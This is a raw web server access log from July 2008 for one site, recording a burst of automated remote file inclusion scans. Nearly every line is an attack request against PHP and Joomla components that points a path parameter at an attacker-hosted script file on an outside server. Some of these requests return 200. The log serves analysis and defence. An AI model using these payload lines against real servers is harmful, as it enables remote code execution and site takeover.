202.164.225.11 - - [06/Jul/2008:09:41:33 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:41:33 -0700] "GET /logs/access_080303.log//index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:41:34 -0700] "GET /logs//index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:41:34 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18593 "-" "libwww-perl/5.803" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:41:35 -0700] "GET //index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 200 18523 "-" "libwww-perl/5.73" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:41:35 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.93.31 - - [06/Jul/2008:09:41:46 -0700] "GET //wp-content/plugins/wp-cal/functions/editevent.php?id=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
83.170.93.31 - - [06/Jul/2008:09:41:46 -0700] "GET /logs//wp-content/plugins/wp-cal/functions/editevent.php?id=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:09:41:57 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:41:59 -0700] "GET /logs/access_080201.log/old_reports.php?file=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:41:59 -0700] "GET /old_reports.php?file=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:41:59 -0700] "GET /logs/old_reports.php?file=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:42:01 -0700] "GET /logs/access_080117.log/old_reports.php?file=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:09:42:25 -0700] "GET /p.php?p=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:42:40 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:42:48 -0700] "GET /logs/access_080218.log/errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:43:16 -0700] "GET /logs/access_080315.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:43:27 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:43:27 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:43:35 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:43:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:43:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:43:45 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:43:46 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:43:46 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:43:46 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [06/Jul/2008:09:43:47 -0700] "GET /logs/access_080121.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:43:48 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [06/Jul/2008:09:43:49 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?M=A HTTP/1.1" 200 8443 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:43:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:43:53 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:43:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:43:54 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:09:44:00 -0700] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:09:44:01 -0700] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 200 18479 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:44:06 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:44:06 -0700] "GET /index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:44:06 -0700] "GET /logs/index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:22 -0700] "GET /logs/access_080207.log/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:22 -0700] "GET /index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:22 -0700] "GET /logs/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:24 -0700] "GET /logs/access.log/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:25 -0700] "GET /logs/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:44:25 -0700] "GET /index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:44:25 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:44:26 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:44:42 -0700] "GET /logs/nav.php?pag=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:44:42 -0700] "GET /nav.php?pag=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:44:49 -0700] "GET /logs/access_080129.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:44:50 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:44:50 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:44:50 -0700] "GET /logs/access.log/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:44:50 -0700] "GET /logs/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:09:44:54 -0700] "GET /logs/access_080225.log/index.php?body=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:09:44:54 -0700] "GET /logs/access_080213.log/index.php?body=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:09:44:54 -0700] "GET /logs/index.php?body=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:09:44:56 -0700] "GET /index.php?body=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:45:12 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:45:16 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:45:16 -0700] "GET /index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:45:16 -0700] "GET /logs/index2.php?DoAction=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:45:17 -0700] "GET /logs/access_080207.log/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:45:17 -0700] "GET /index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:45:17 -0700] "GET /logs/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:09:45:20 -0700] "GET /logs/access.log/index1.php?choix=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.188.110.128 - - [06/Jul/2008:09:45:36 -0700] "GET /logs/errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.110.128 - - [06/Jul/2008:09:45:36 -0700] "GET /errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:45:55 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:46:18 -0700] "GET /logs/access_071230.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:21 -0700] "GET /logs/access_080329.log/db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:22 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:22 -0700] "GET /db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:23 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:23 -0700] "GET /logs/db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:46:24 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:46:41 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.0.39 - - [06/Jul/2008:09:46:44 -0700] "GET /index1.php?x=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
201.212.0.39 - - [06/Jul/2008:09:46:44 -0700] "GET /logs/index1.php?x=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.108.67.119 - - [06/Jul/2008:09:46:51 -0700] "GET /logs/errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [06/Jul/2008:09:46:52 -0700] "GET /errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:47:01 -0700] "GET /logs/access.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:47:01 -0700] "GET /logs/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:47:02 -0700] "GET /logs/access_080212.log/modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:47:02 -0700] "GET /modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:47:02 -0700] "GET /logs/modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:47:03 -0700] "GET /index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 4654 "-" "libwww-perl/5.65" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:06 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:06 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:06 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:47:15 -0700] "GET /logs/home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:47:15 -0700] "GET /home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:47:22 -0700] "GET /logs/access_080418.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:27 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:36 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:36 -0700] "GET /index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:47:36 -0700] "GET /logs/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:47:42 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:47:43 -0700] "GET /index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:47:43 -0700] "GET /logs/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:47:58 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:48:02 -0700] "GET /logs/access_080117.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:48:08 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:48:10 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18591 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:48:10 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:09:48:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:48:47 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:48:48 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:48:48 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.190.131.43 - - [06/Jul/2008:09:48:52 -0700] "GET /logs/access_080212.log//index.php?incl=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [06/Jul/2008:09:48:53 -0700] "GET //index.php?incl=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 200 18433 "-" "libwww-perl/5.69" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:48:54 -0700] "GET /logs/access_080201.log/modules%5Cclass%5Ctournament%5CTreeSingle.php/sys_conf[path]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.131.43 - - [06/Jul/2008:09:48:54 -0700] "GET /logs//index.php?incl=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [06/Jul/2008:09:48:55 -0700] "GET /logs/access_080105.log//index.php?incl=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:09:48:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
